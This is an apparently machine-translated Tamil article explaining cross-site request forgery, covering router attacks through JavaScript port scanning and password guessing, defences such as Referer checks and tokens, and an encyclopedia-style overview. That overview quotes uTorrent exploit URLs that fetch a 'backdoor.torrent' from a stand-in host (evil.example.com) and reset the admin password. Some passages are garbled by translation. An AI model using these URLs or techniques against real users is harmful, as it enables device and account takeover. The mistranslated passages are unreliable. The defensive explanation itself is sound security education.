கிராஸ்-சைட் கோரிக்கை மோசடி - எதையும் பற்றி நிறைய வம்பு

அலெக்சாண்டர் ஆன்டிபோவ்

IN சமீபத்தில்கிராஸ்-சைட் ரிக்வெஸ்ட் ஃபோர்ஜரி (CSRF அல்லது XSRF) எனப்படும் "புதிய" வகை பாதிப்பு பற்றி வலை பயன்பாட்டு பாதுகாப்பு சமூகத்தில் பரவலான விவாதம் உள்ளது. வாசகரின் கவனத்திற்கு நாங்கள் கொண்டு வரும் கட்டுரையில் இந்த வகையான பாதிப்புகள், அதன் பயன்பாட்டின் முறைகள் மற்றும் பாதுகாப்பிற்கான முக்கிய அணுகுமுறைகள் பற்றிய விளக்கம் உள்ளது.

செர்ஜி கோர்டேச்சிக்

கோர்டே @ ptsecurity com

சமீபத்தில், வலை பயன்பாட்டு பாதுகாப்பு சமூகத்தில் கிராஸ்-சைட் ரிக்வெஸ்ட் ஃபோர்ஜரி (CSRF அல்லது XSRF) எனப்படும் "புதிய" வகை பாதிப்பு பற்றி நிறைய விவாதங்கள் நடந்துள்ளன. வாசகரின் கவனத்திற்கு நாங்கள் கொண்டு வரும் கட்டுரையில் இந்த வகையான பாதிப்புகள், அதன் பயன்பாட்டின் முறைகள் மற்றும் பாதுகாப்பிற்கான முக்கிய அணுகுமுறைகள் பற்றிய விளக்கம் உள்ளது. கிராஸ்-சைட் கோரிக்கை மோசடிக்கான பொதுவாக ஏற்றுக்கொள்ளப்பட்ட ரஷ்ய சொல் இன்னும் நிறுவப்படவில்லை, எனவே ஆசிரியர் "HTTP கோரிக்கை மோசடி" விருப்பத்தைப் பயன்படுத்த பரிந்துரைக்கிறார்.

பாடல் வரி விலக்கு

முதலாவதாக, CSRF உடன் தொடர்புடைய முக்கிய தவறான கருத்துக்களைப் பற்றி நான் வாழ விரும்புகிறேன்:

1. HTTP கோரிக்கை போலியானது ஒரு புதிய வகை பாதிப்பு.

இது உண்மையிலிருந்து வெகு தொலைவில் உள்ளது. செய்தி மூலத்தை ஏமாற்றுதல் என்ற தலைப்பில் கோட்பாட்டுச் சிந்தனைகள் 1988 (http://www.cis.upenn.edu/~KeyKOS/ConfusedDeputy.html), மற்றும் பாதிப்புகளின் நடைமுறை எடுத்துக்காட்டுகள் குறைந்தது 2000 முதல் பக்ட்ராக்கில் விவாதிக்கப்படுகின்றன (http //www. zope.org/Members/jim/ZopeSecurity/ClientSideTrojan). 2001 இல் பீட்டர் வாட்கின்ஸ் (http://www.securiteam.com/securitynews/5FP0C204KE.html) மூலம் இந்த வார்த்தை அறிமுகப்படுத்தப்பட்டது.

2. CSRF என்பது கிராஸ்-சைட் ஸ்கிரிப்டிங்கின் (XSS) மாறுபாடாகும்.

CSRF மற்றும் XSS இடையே உள்ள ஒரே ஒற்றுமை, வலை பயன்பாட்டு கிளையண்டுகளை தாக்குதல் திசையனாகப் பயன்படுத்துவதாகும் (WASC டெர்மினாலஜியில் கிளையண்ட்-சைட் அட்டாக் http://www.webappsec.org/projects/threat/). CSRF பாதிப்புகள் XSS அல்லது "ரீடைரக்டர்கள்" (http://www..php) உடன் இணைந்து பயன்படுத்தப்படலாம், ஆனால் பாதிப்புகளின் தனி வகுப்பைப் பிரதிநிதித்துவப்படுத்துகிறது.

3. CSRF பாதிப்பு பொதுவானதல்ல மற்றும் சுரண்டுவது மிகவும் கடினம்.

இணைய பயன்பாடுகளின் ஊடுருவல் சோதனை மற்றும் பாதுகாப்பு மதிப்பீட்டின் போது நேர்மறை தொழில்நுட்பங்களால் பெறப்பட்ட தரவு, பெரும்பாலான இணைய பயன்பாடுகள் இந்த பாதிப்பிற்கு ஆளாகின்றன என்பதைக் காட்டுகிறது. மற்ற பாதிப்புகளைப் போலல்லாமல், CSRF ஆனது நிரலாக்கப் பிழைகளின் விளைவாக ஏற்படாது, ஆனால் இணைய சேவையகம் மற்றும் உலாவியின் இயல்பான நடத்தை. அந்த. நிலையான கட்டமைப்பைப் பயன்படுத்தும் பெரும்பாலான தளங்கள் இயல்பாகவே பாதிக்கப்படக்கூடியவை.

பயன்பாட்டு உதாரணம்

CSRF இன் பயன்பாட்டை ஒரு உதாரணத்துடன் பார்க்கலாம். செய்திகளை அனுப்பும் இணையப் பயன்பாடு இருப்பதாக வைத்துக்கொள்வோம் மின்னஞ்சல். பயனர் மின்னஞ்சல் முகவரி மற்றும் செய்தி உரையைக் குறிப்பிடுகிறார், சமர்ப்பி பொத்தானைக் கிளிக் செய்கிறார், மேலும் அவரது முகவரியிலிருந்து செய்தி பெறுநருக்கு அனுப்பப்படும்.

அரிசி. 1. செய்தி அனுப்புதல்

இந்தத் திட்டம் பல தளங்களில் இருந்து நன்கு தெரிந்ததே மற்றும் எந்த ஆட்சேபனையும் எழுப்பவில்லை. இருப்பினும், கூறப்பட்ட பயன்பாடு HTTP கோரிக்கை மோசடி தாக்குதல்களால் பாதிக்கப்படும் வாய்ப்பு அதிகம். பாதிப்பைப் பயன்படுத்திக் கொள்ள, தாக்குபவர் தனது இணையதளத்தில் ஒரு “படத்திற்கான” இணைப்பைக் கொண்ட ஒரு பக்கத்தை உருவாக்கலாம், பின்னர் தனது இணையதளத்திற்கான இணைப்பைப் பின்தொடருமாறு பயனரை கட்டாயப்படுத்தலாம் (எடுத்துக்காட்டாக, http://bh.ptsecurity.ru/xcheck /csrf.htm).

ஒரு பக்கத்தை அணுகும்போது, ​​பயனரின் உலாவி படத்தை ஏற்ற முயற்சிக்கிறது, அதற்காக அது பாதிக்கப்படக்கூடிய பயன்பாட்டைத் தொடர்பு கொள்கிறது, அதாவது. கோரிக்கையின் "to" புலத்தில் குறிப்பிடப்பட்டுள்ள பெறுநருக்கு மின்னஞ்சல் செய்தியை அனுப்புகிறது.

அரிசி. 2. CSRF தாக்குதல்

பயனரின் உலாவி தளத்திற்கு குக்கீ மதிப்பை அனுப்பும் என்பதை நினைவில் கொள்ளவும், அதாவது. கோரிக்கை அங்கீகரிக்கப்பட்ட பயனரிடமிருந்து வந்ததாக உணரப்படும். பாதிக்கப்படக்கூடிய சேவையகத்திற்கு கோரிக்கையை அனுப்பும் பக்கத்தை ஏற்றுமாறு பயனரை கட்டாயப்படுத்த, தாக்குபவர் முறைகளைப் பயன்படுத்தலாம் சமூக பொறியியல், அத்துடன் XSS போன்ற தொழில்நுட்ப பாதிப்புகள் மற்றும் திசைதிருப்பல் செயல்பாட்டை செயல்படுத்துவதில் உள்ள பிழைகள்.

அரிசி. 3. CSRF செயல்பாட்டின் தர்க்கம்

எனவே, CSRF தாக்குதல் என்பது பயனரின் உலாவியைப் பயன்படுத்தி தன்னிச்சையான தளங்களுக்கு HTTP கோரிக்கைகளை அனுப்புவதை உள்ளடக்குகிறது, மேலும் பாதிப்பு என்பது HTTP கோரிக்கையின் மூலத்தைச் சரிபார்க்கத் தவறியதாகும். எடுத்துக்காட்டுப் பயன்பாடு அளவுருக்களை அனுப்ப HTTP GET முறையைப் பயன்படுத்துகிறது, இது தாக்குபவர்களுக்கு வாழ்க்கையை எளிதாக்குகிறது. இருப்பினும், POST முறையைப் பயன்படுத்துவது HTTP கோரிக்கை மோசடி தாக்குதல்களின் சாத்தியத்தை தானாகவே நீக்குகிறது என்று கருத வேண்டாம். தாக்குபவரின் சேவையகத்தில் உள்ள பக்கம் ஒரு ஆயத்த HTML படிவத்தைக் கொண்டிருக்கலாம், அது பக்கத்தைப் பார்க்கும்போது தானாகவே சமர்ப்பிக்கப்படும்.

CSRFஐப் பயன்படுத்த, தாக்குபவர் தனது சொந்த இணையச் சேவையகத்தைக் கொண்டிருக்க வேண்டிய அவசியமில்லை. கோரிக்கையைத் தொடங்கும் பக்கம் மின்னஞ்சல் அல்லது பிற வழிகளில் அனுப்பப்படலாம்.

பில்லி ஹாஃப்மேனின் மதிப்பாய்வு ஜாவாஸ்கிரிப்டைப் பயன்படுத்தி நெட்வொர்க்கிங் செய்யும் பல்வேறு முறைகளை உள்ளடக்கியது. அவை அனைத்தும், XmlHttxmpquest உட்பட (சில சூழ்நிலைகளில்), CSRF தாக்குதல்களை செயல்படுத்த பயன்படுத்தப்படலாம்.

CSRF மற்றும் XSS ஆகியவற்றுக்கு இடையேயான முக்கிய வேறுபாட்டை இப்போது வாசகர் புரிந்துகொண்டிருப்பார் என்று நம்புகிறேன். XSS ஐப் பொறுத்தவரை, தாக்குபவர், பாதிக்கப்படக்கூடிய பக்கத்தின் DOM (ஆவண பொருள் மாதிரி)க்கான அணுகலைப் பெறுகிறார், படிக்கவும் எழுதவும். CSRF ஐ இயக்கும் போது, ​​பயனரின் உலாவியைப் பயன்படுத்தி சேவையகத்திற்கு கோரிக்கையை அனுப்ப தாக்குபவர்களுக்கு வாய்ப்பு உள்ளது, ஆனால் சேவையகத்தின் பதிலைப் பெறவும் பகுப்பாய்வு செய்யவும் முடியாது, அதன் தலைப்பு (எடுத்துக்காட்டாக, குக்கீ). அதன்படி, "HTTP கோரிக்கை மோசடி" நீங்கள் "எழுது-மட்டும்" பயன்முறையில் பயன்பாட்டுடன் வேலை செய்ய அனுமதிக்கிறது, இருப்பினும், உண்மையான தாக்குதல்களைச் செய்ய இது போதுமானது.

CSRF தாக்குதல்களின் முக்கிய இலக்குகள் மின்னஞ்சல் அமைப்புகள், மன்றங்கள், CMS, இடைமுகங்கள் போன்ற பல்வேறு ஊடாடும் வலை பயன்பாடுகள் ஆகும். தொலையியக்கி பிணைய உபகரணங்கள். எடுத்துக்காட்டாக, தாக்குபவர் மற்ற பயனர்களின் சார்பாக செய்திகளை அனுப்பலாம், புதிய கணக்குகளைச் சேர்க்கலாம் அல்லது வலை இடைமுகத்தின் மூலம் திசைவி அமைப்புகளை மாற்றலாம்.

அரிசி. 4. மன்றத்தில் CSRF ஐப் பயன்படுத்துவதற்கான எடுத்துக்காட்டு

கடைசியாக - அமைப்புகளை மாற்றுவதை இன்னும் விரிவாகப் பார்ப்போம் பிணைய சாதனங்கள். ஆசிரியர் ஏற்கனவே வயர்லெஸ் தாக்குதல் கண்டறிதல் அமைப்புகளைக் குறிப்பிடுகிறார், ஆனால் இயற்கையாகவே, விஷயம் அவர்களுக்கு மட்டுப்படுத்தப்படவில்லை.

நாங்கள் சுற்றளவை உடைக்கிறோம்

கடந்த டிசம்பரில், சைமென்டெக் "டிரைவ்-பை பார்மிங்" என்ற "புதிய" தாக்குதல் பற்றிய அறிக்கையை வெளியிட்டது, இது அடிப்படையில் CSRF சுரண்டலின் மாறுபாடாகும். தாக்குபவர் பயனரின் உலாவியில் சில வகையான "மேஜிக்" ஜாவாஸ்கிரிப்டை இயக்குகிறார், இது திசைவி அமைப்புகளை மாற்றுகிறது, எடுத்துக்காட்டாக, புதிய DNS சேவையக மதிப்பை அமைக்கிறது. இந்த தாக்குதலைச் செய்ய, நீங்கள் பின்வரும் சிக்கல்களைத் தீர்க்க வேண்டும்:

ஜாவாஸ்கிரிப்டைப் பயன்படுத்தி போர்ட் ஸ்கேனிங்;

வலை பயன்பாட்டின் வகையைத் தீர்மானித்தல் (கைரேகை);

CSRF ஐப் பயன்படுத்தி கடவுச்சொல் யூகித்தல் மற்றும் அங்கீகாரம்;

CSRF தாக்குதலைப் பயன்படுத்தி ஹோஸ்ட் அமைப்புகளை மாற்றுதல்.

ஜாவாஸ்கிரிப்டைப் பயன்படுத்தி ஒரு வலை சேவையகத்தின் கிடைக்கும் தன்மை மற்றும் அதன் மென்பொருள் வகையைத் தீர்மானிக்க ஸ்கேன் செய்யும் நுட்பம் நன்றாக வேலை செய்யப்பட்டுள்ளது. மாறும் உருவாக்கம் HTML பொருள்கள் (எ.கா. img src=) பல்வேறு உள் URLகளை சுட்டிக்காட்டுகிறது (எ.கா. http://192.168.0.1/pageerror.gif). "படம்" வெற்றிகரமாக ஏற்றப்பட்டால், சோதனை செய்யப்பட்ட முகவரியில் மைக்ரோசாஃப்ட் ஐஐஎஸ் அடிப்படையிலான வலை சேவையகம் உள்ளது. பதில் 404 பிழையைப் பெற்றிருந்தால், போர்ட் திறந்திருக்கும் மற்றும் வலை சேவையகம் அதில் இயங்குகிறது. நேரம் முடிந்துவிட்டால், சர்வர் நெட்வொர்க்கில் இல்லை அல்லது ஃபயர்வாலில் போர்ட் தடுக்கப்பட்டிருக்கும். சரி, மற்ற சூழ்நிலைகளில் - போர்ட் மூடப்பட்டது, ஆனால் ஹோஸ்ட் அணுகக்கூடியது (சேவையகம் RST பாக்கெட்டை வழங்கியது மற்றும் உலாவி காலாவதியாகும் முன் பிழையை வழங்கியது). சில சூழ்நிலைகளில், ஜாவாஸ்கிரிப்ட் (http://jeremiahgrossman.blogspot.com/2006/11/browser-port-scanning-without.html) இல்லாமல் பயனரின் உலாவியில் இருந்து போர்ட் ஸ்கேனிங் செய்ய முடியும்.

சாதனத்தின் வகையைத் தீர்மானித்த பிறகு, அமைப்புகளை மாற்றுவதற்கான கோரிக்கையை உடனடியாக அனுப்பும்படி தாக்குபவர் பயனரின் உலாவியை கட்டாயப்படுத்த முயற்சிக்கலாம். ஆனால் பயனரின் உலாவி ஏற்கனவே சாதனத்திலிருந்து செயலில் அங்கீகரிக்கப்பட்ட அமர்வு இருந்தால் மட்டுமே அத்தகைய கோரிக்கை வெற்றிகரமாக இருக்கும். கையில் வேண்டும் திறந்த பக்கம்ஒரு திசைவியை நிர்வகிப்பது பல "மேம்பட்ட" பயனர்களின் கெட்ட பழக்கமாகும்.

மேலாண்மை இடைமுகத்துடன் செயலில் அமர்வு இல்லை என்றால், தாக்குபவர் அங்கீகரிக்க வேண்டும். சாதனம் படிவங்கள் அடிப்படையிலான அங்கீகாரத்தை செயல்படுத்தினால், எந்த பிரச்சனையும் ஏற்படாது. POST இல் CSRF ஐப் பயன்படுத்தி, ஒரு அங்கீகாரக் கோரிக்கை சேவையகத்திற்கு அனுப்பப்படுகிறது, அதன் பிறகு ஒரு படம் (அல்லது பக்கம்) அதில் இருந்து ஏற்றப்படும், அங்கீகரிக்கப்பட்ட பயனர்கள் மட்டுமே அணுக முடியும். படம் பெறப்பட்டால், அங்கீகாரம் வெற்றிகரமாக இருந்தது, நீங்கள் தொடரலாம் மேலும் நடவடிக்கைகள், இல்லையெனில், வேறு கடவுச்சொல்லை முயற்சிக்கவும்.

தாக்கப்பட்ட சாதனம் அடிப்படை அங்கீகாரத்தை செயல்படுத்தினால், பணி மிகவும் சிக்கலாகிறது. வளைதள தேடு கருவி URL இல் பயனர்பெயர் மற்றும் கடவுச்சொல்லைக் குறிப்பிடும் திறனை Explorer ஆதரிக்கவில்லை (எடுத்துக்காட்டாக, http://user: [மின்னஞ்சல் பாதுகாக்கப்பட்டது]) இது சம்பந்தமாக, அடிப்படை அங்கீகாரத்தைச் செய்ய, கட்டுரையில் விவரிக்கப்பட்டுள்ள Flash ஐப் பயன்படுத்தி HTTP தலைப்புகளைச் சேர்க்கும் முறையைப் பயன்படுத்தலாம். இருப்பினும், இந்த முறை Flash இன் பழைய பதிப்புகளுக்கு மட்டுமே வேலை செய்கிறது, அவை குறைவாகவும் குறைவாகவும் உள்ளன.

ஆனால் பயர்பாக்ஸ் போன்ற பிற உலாவிகள், URL இல் பயனர்பெயர் மற்றும் கடவுச்சொல்லைக் குறிப்பிடும் திறனை வழங்குகின்றன, மேலும் எந்த சேவையகத்தையும் அங்கீகரிக்க பயன்படுத்தலாம், மேலும் கடவுச்சொல் தவறாக இருந்தால் பிழை செய்தியை உருவாக்காமல் இதைச் செய்யலாம்.

Stefan Esser இன் வலைப்பதிவிலிருந்து அடிப்படை முறையைப் பயன்படுத்தி அமைதியான அங்கீகாரத்திற்கான எடுத்துக்காட்டு ஸ்கிரிப்ட் கீழே கொடுக்கப்பட்டுள்ளது.

பயர்பாக்ஸ் HTTP அங்கீகாரம் ப்ரூட்ஃபோர்சிங்

அரிசி. 5. பயர்பாக்ஸில் அடிப்படை அங்கீகாரம்

டொமைன் அடிப்படையிலான SSO வழிமுறைகள் பெரும்பாலும் பயன்படுத்தப்படும் கார்ப்பரேட் சூழலில் செயலில் உள்ள அடைவுமற்றும் கெர்பரோஸ் மற்றும் NTLM நெறிமுறைகள், CSRF ஐப் பயன்படுத்துவதற்கு கூடுதல் முயற்சி தேவையில்லை. தற்போதைய பயனரின் பாதுகாப்பு சூழலுக்கு எதிராக உலாவி தானாகவே அங்கீகரிக்கும்.

அங்கீகாரம் நிறைவேற்றப்பட்ட பிறகு, DNS சேவையக முகவரி போன்ற தன்னிச்சையான திசைவி அமைப்புகளை மாற்றும் கோரிக்கையை அனுப்ப, தாக்குபவர் JavaScript ஐப் பயன்படுத்துகிறார்.

பாதுகாப்பு முறைகள்

CSRF பாதுகாப்பு என்று வரும்போது முதலில் நினைவுக்கு வருவது ரெஃபரர் ஹெடரின் மதிப்பைச் சரிபார்ப்பதுதான். உண்மையில், HTTP கோரிக்கை மோசடியானது மூன்றாவது தளத்திலிருந்து கோரிக்கையை அனுப்புவதை உள்ளடக்கியதால், உலாவியின் மூலம் கோரிக்கைத் தலைப்புகளில் தானாகச் சேர்க்கப்படும் அசல் பக்கத்தைக் கட்டுப்படுத்துவது சிக்கலைத் தீர்க்கும்.

இருப்பினும், இந்த பொறிமுறையானது பல குறைபாடுகளைக் கொண்டுள்ளது. முதலாவதாக, பரிந்துரையாளர் தலைப்பு இல்லாத கோரிக்கைகளை செயலாக்குவது குறித்த கேள்வியை டெவலப்பர் எதிர்கொள்கிறார். தனிப்பட்ட பல ஃபயர்வால்கள்மற்றும் ப்ராக்ஸி சேவையகங்களை அநாமதேயமாக்குவது ரெஃபரரைப் பாதுகாப்பற்ற தலைப்பாகக் குறைக்கிறது. அதன்படி, சர்வர் புறக்கணித்தால் இதே போன்ற கோரிக்கைகள், மிகவும் "சித்தப்பிரமை" குடிமக்கள் குழு அவருடன் வேலை செய்ய முடியாது.

இரண்டாவதாக, சில சூழ்நிலைகளில் பரிந்துரையாளர் தலைப்பை ஏமாற்றலாம், எடுத்துக்காட்டாக ஏற்கனவே குறிப்பிட்டுள்ள ஃப்ளாஷ் தந்திரத்தைப் பயன்படுத்தி. பயனர் IE 6.0 ஐப் பயன்படுத்தினால், XmlHttxmpquest செயலாக்கத்தில் உள்ள பிழையைப் பயன்படுத்த, கோரிக்கை தலைப்பின் உள்ளடக்கங்கள் மாற்றியமைக்கப்படலாம். HTTP முறையின் பெயரில் புதிய வரி எழுத்துக்களைப் பயன்படுத்துவதற்கான சாத்தியக்கூறுகளில் பாதிப்பு உள்ளது, இது தலைப்புகளை மாற்றவும் மற்றும் கூடுதல் கோரிக்கையை உட்செலுத்தவும் அனுமதிக்கிறது. இந்த பாதிப்பை அமித் க்ளீன்() 2005 இல் கண்டுபிடித்தார் மற்றும் 2007 இல் மீண்டும் கண்டுபிடிக்கப்பட்டது. இந்த முறையின் வரம்பு என்னவென்றால், பயனருக்கும் சேவையகத்திற்கும் இடையில் HTTP ப்ராக்ஸி இருந்தால் அல்லது சேவையகங்கள் ஒரே IP முகவரியில் இருந்தால் மட்டுமே இது செயல்படும். ஆனால் வெவ்வேறு டொமைன் பெயர்கள்.

ஒவ்வொரு கோரிக்கைக்கும் ஒரு தனிப்பட்ட அளவுருவைச் சேர்ப்பது மற்றொரு பொதுவான முறையாகும், இது சேவையகத்தால் சரிபார்க்கப்படுகிறது. GET கோரிக்கையைப் பயன்படுத்தும் போது URL இல் அளவுருவைச் சேர்க்கலாம், அதாவது POST ஐப் பயன்படுத்தும் போது மறைந்திருக்கும் படிவ அளவுருவாகும். அளவுருவின் மதிப்பு தன்னிச்சையாக இருக்கலாம், முக்கிய விஷயம் என்னவென்றால், தாக்குபவர் அதை கணிக்க முடியாது, எடுத்துக்காட்டாக, பயனரின் அமர்வின் மதிப்பு.

அரிசி. 6. பிட்ரிக்ஸில் CSRF பாதுகாப்பு

உங்கள் பயன்பாட்டிற்கு CSRF சரிபார்ப்பு செயல்பாட்டை விரைவாகச் சேர்க்க, பின்வரும் அணுகுமுறையைப் பயன்படுத்தலாம்:

1. உருவாக்கப்பட்ட ஒவ்வொரு பக்கத்திலும் ஒரு சிறிய ஜாவாஸ்கிரிப்ட்டைச் சேர்க்கவும், அனைத்து படிவங்களுக்கும் கூடுதல் மறைக்கப்பட்ட அளவுருவைச் சேர்க்கிறது, இது குக்கீ மதிப்பு ஒதுக்கப்படுகிறது.

2. POST முறையைப் பயன்படுத்தி கிளையன்ட் அனுப்பிய தரவு தற்போதைய குக்கீ மதிப்புக்கு சமமான மதிப்பைக் கொண்டுள்ளது என்பதை சர்வரில் சரிபார்க்கவும்.

அத்தகைய கிளையன்ட் ஸ்கிரிப்ட்டின் எடுத்துக்காட்டு கீழே கொடுக்கப்பட்டுள்ளது:

இந்த அணுகுமுறையின் மேலும் வளர்ச்சியானது, அமர்வு அடையாளங்காட்டியை ஒரு குக்கீயில் அல்ல, மாறாக ஒரு மறைக்கப்பட்ட படிவ அளவுருவாக சேமிப்பதாகும் (எடுத்துக்காட்டாக, VIEWSTATE).

CSRF-ஐ எதிர்ப்பதற்கான ஒரு முறையாக, டூரிங் சோதனைகளின் பல்வேறு பதிப்புகளைப் பயன்படுத்தலாம், எடுத்துக்காட்டாக, நன்கு அறியப்பட்ட படங்கள் - CAPTCHA. முக்கியமான அமைப்புகளை மாற்றும்போது பயனர் கடவுச்சொல் தேவைப்படுவது மற்றொரு பிரபலமான விருப்பமாகும்.

அரிசி. 7. mail.ru இல் CSRF பாதுகாப்பு

எனவே, கிராஸ்-சைட் கோரிக்கை மோசடி என்பது ஒரு வலை பயன்பாட்டின் கிளையண்டை இலக்காகக் கொண்ட ஒரு தாக்குதலாகும் மற்றும் HTTP கோரிக்கையின் ஆதாரத்தின் போதுமான சரிபார்ப்பைப் பயன்படுத்தவில்லை. இத்தகைய தாக்குதல்களிலிருந்து பாதுகாக்க, பரிந்துரையாளர் தலைப்பு அல்லது கூடுதல் "ரேண்டம்" அளவுருவின் அடிப்படையில் கோரிக்கை மூலத்தின் கூடுதல் கட்டுப்பாட்டைப் பயன்படுத்தலாம்.

Sergey Gordeychik Positive Technologies இல் சிஸ்டம் ஆர்க்கிடெக்ட்டாக பணிபுரிகிறார், அங்கு அவர் பயன்பாட்டு பாதுகாப்பு, வயர்லெஸ் மற்றும் மொபைல் தொழில்நுட்பங்கள். ஆசிரியர் பாதுகாப்பின் முன்னணி டெவலப்பரும் ஆவார் வயர்லெஸ் நெட்வொர்க்குகள்இன்ஃபார்ம்சாஷிதா பயிற்சி மையத்தின் ", "வலை பயன்பாடுகளின் பாதுகாப்பின் பகுப்பாய்வு மற்றும் மதிப்பீடு". "Windows IT Pro/RE", SecurityLab மற்றும் பிற வெளியீடுகளில் பல டஜன் கட்டுரைகளை வெளியிட்டது. அவர் Web Application Security Consortium (WASC) திட்டங்களில் உறுப்பினராக உள்ளார்.

கிராஸ்-சைட் கோரிக்கை மோசடி, ஒரு கிளிக் தாக்குதல் அல்லது அமர்வு இயக்கி என்றும் அழைக்கப்படுகிறது மற்றும் சுருக்கமாக CSRF (சில நேரங்களில் வெளிப்படுத்தப்படுகிறது அலை துளைகேள்)) அல்லது XSRF என்பது, இணையப் பயன்பாடு நம்பும் பயனரிடமிருந்து அங்கீகரிக்கப்படாத கட்டளைகள் அனுப்பப்படும் இணையதளத்தில் இருந்து சுரண்டப்படும் ஒரு வகையான தீம்பொருள் ஆகும். ஒரு தீங்கிழைக்கும் இணையதளம் அத்தகைய கட்டளைகளை அனுப்ப பல வழிகள் உள்ளன; சிறப்பாக வடிவமைக்கப்பட்ட படக் குறிச்சொற்கள், மறைக்கப்பட்ட படிவங்கள் மற்றும் JavaScript XMLHttpRequests, எடுத்துக்காட்டாக, அனைத்து பயனர் தொடர்பு அல்லது அறிவு இல்லாமல் வேலை செய்ய முடியும். கிராஸ்-சைட் ஸ்கிரிப்டிங் (XSS) போலல்லாமல், ஒரு குறிப்பிட்ட தளத்தின் மீது பயனர் வைத்திருக்கும் நம்பிக்கையைப் பயன்படுத்துகிறது, CSRF பயனரின் உலாவியில் தளம் வைத்திருக்கும் நம்பிக்கையைப் பயன்படுத்துகிறது.

கதை

CSRF பாதிப்புகள் அறியப்படுகின்றன மற்றும் சில சந்தர்ப்பங்களில் 2001 முதல் பயன்படுத்தப்படுகின்றன. இது பயனரின் IP முகவரியில் இருந்து மேற்கொள்ளப்படுவதால், சில இணையதளப் பதிவுகளில் CSRFக்கான ஆதாரம் இல்லாமல் இருக்கலாம். சுரண்டல்கள் குறைத்து மதிப்பிடப்படுகின்றன, மூலம் குறைந்தபட்சம்பொதுவில், மற்றும் 2007 வரை பல நன்கு ஆவணப்படுத்தப்பட்ட எடுத்துக்காட்டுகள் இருந்தன:

• 2006 ஆம் ஆண்டில் நெட்ஃபிக்ஸ் இணையதளம் பல CSRF பாதிப்புகளைக் கொண்டிருந்தது, அவை பாதிக்கப்பட்டவரின் வாடகை வரிசையில் டிவிடியைச் சேர்ப்பது, கணக்கில் ஷிப்பிங் முகவரியை மாற்றுவது அல்லது கணக்கை முழுவதுமாக சமரசம் செய்ய பாதிக்கப்பட்டவரின் உள்நுழைவு சான்றுகளை மாற்றுவது போன்ற செயல்களை தாக்குபவர் அனுமதிக்கும்.
• ஆன்லைன் வங்கி வலைப் பயன்பாடு ING Direct CSRF தாக்குதல்களால் பாதிக்கப்படக்கூடியதாக இருந்தது, இது சட்டவிரோத பணப் பரிமாற்றங்களை அனுமதிக்கிறது.
• பிரபலமான வீடியோ வலைத்தளமான யூடியூப் 2008 ஆம் ஆண்டில் CSRF ஆல் பாதிக்கப்படக்கூடியதாக இருந்தது, மேலும் எந்தவொரு பயனரும் செய்யக்கூடிய எதையும் தாக்குபவர்கள் செய்ய இது அனுமதித்தது.
• McAfee CSRF க்கு பாதிப்புக்குள்ளானது, இது தாக்குபவர்கள் தங்கள் நிறுவன அமைப்பை மாற்ற அனுமதித்தது.

மாற்றுவதற்கான முயற்சிகள் உட்பட, 2018 இல் இணைய சாதனங்களில் புதிய தாக்குதல்கள் நடத்தப்பட்டன DNS அமைப்புகள்திசைவிகள். சில திசைவி உற்பத்தியாளர்கள் பாதுகாப்பை மேம்படுத்த ஃபார்ம்வேர் புதுப்பிப்புகளை வெளியிட விரைந்தனர் மற்றும் அபாயத்தைக் குறைக்க பயனர்கள் தங்கள் திசைவி அமைப்புகளை மாற்றுமாறு அறிவுறுத்தினர். "வெளிப்படையான பாதுகாப்பு காரணங்களை" மேற்கோள் காட்டி, விவரங்கள் வெளியிடப்படவில்லை.

எடுத்துக்காட்டு மற்றும் பண்புகள்

பாதிக்கப்பட்டவர் பதிவு செய்யும் போது, ​​இறங்கும் பக்கத்தில் குறிப்பிட்ட செயலைச் செய்யும் மறுஉருவாக்கம் செய்யக்கூடிய இணைப்பைக் கண்டறியும் தாக்குபவர்கள், தாங்கள் கட்டுப்படுத்தும் பக்கத்தில் அத்தகைய இணைப்பை உட்பொதித்து, பாதிக்கப்பட்டவரைத் திறக்கும்படி ஏமாற்றலாம். தாக்குதல் மீடியா இணைப்பு, இலக்கு தளத்தில் உள்நுழைவதன் மூலம் (ஒரு மன்ற விவாதம் போன்றவை) அல்லது HTML மின்னஞ்சல் அல்லது இணைப்பின் உடலில் அனுப்புவதன் மூலம் பாதிக்கப்பட்டவர் பெரும்பாலும் பார்வையிடக்கூடிய இடத்தில் வைக்கப்படலாம். UTorrent (CVE-2008-6586) இல் உள்ள உண்மையான CSRF பாதிப்பு, அதன் வலை கன்சோலை லோக்கல் ஹோஸ்ட்:8080 இல் அணுகக்கூடியது என்ற உண்மையைப் பயன்படுத்தி, ஒரு எளிய GET கோரிக்கையுடன் முக்கியமான செயல்களைச் செய்ய அனுமதிக்கிறது:

.டோரண்ட் கோப்பு பதிவிறக்கத்தை கட்டாயப்படுத்தவும் http://localhost:8080/gui/action=add URL&s=http://evil.example.com/backdoor.torrent Utorrent நிர்வாகி கடவுச்சொல்லை மாற்றுகிறது & s = webui. கடவுச்சொல் & v = தீய நிர்வாகி

கருத்துக்களம் மற்றும் மின்னஞ்சல் ஸ்பேம்களில் தீங்கிழைக்கும், தானியங்கு HTML பட கூறுகளை வைப்பதன் மூலம் தாக்குதல்கள் தொடங்கப்பட்டன, இதனால் இந்தப் பக்கங்களைப் பார்வையிடும் உலாவிகள் பயனரின் தரப்பில் அதிக நடவடிக்கை இல்லாமல் தானாகவே அவற்றைத் திறக்கும். இந்தப் பக்கங்களைத் திறக்கும் அதே நேரத்தில் Utorrent இன் பாதிக்கப்படக்கூடிய பதிப்பை இயக்கும் நபர்கள் தாக்குதலுக்கு ஆளாக நேரிடும்.

படக் குறிச்சொற்களைப் பயன்படுத்தி CSRF தாக்குதல்கள் பெரும்பாலும் இணைய மன்றங்களில் இருந்து உருவாக்கப்படுகின்றன, அங்கு பயனர்கள் படங்களை இடுகையிடலாம், ஆனால் ஜாவாஸ்கிரிப்ட் அல்ல, எடுத்துக்காட்டாக BBCode ஐப் பயன்படுத்துதல்:

Http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent

Localhost:8080 இல் உள்ள உள்ளூர் Utorrent பயன்பாட்டில் தாக்குதல் இணைப்பை அணுகும் போது, ​​உலாவி எப்போதும் அந்த டொமைனுக்கு இருக்கும் குக்கீகளை தானாகவே அனுப்பும். இணைய உலாவிகளின் இந்த பொதுவான சொத்து CSRF தாக்குதல்களை அவர்களின் இலக்கு பாதிப்புகளை பயன்படுத்தி கொள்ள அனுமதிக்கிறது மற்றும் பயனர் இலக்கு இணையதளத்தில் உள்நுழைந்திருக்கும் வரை (இந்த எடுத்துக்காட்டில் உள்ளூர் வலை- Utorrent இடைமுகம்) தாக்குதலின் போது.

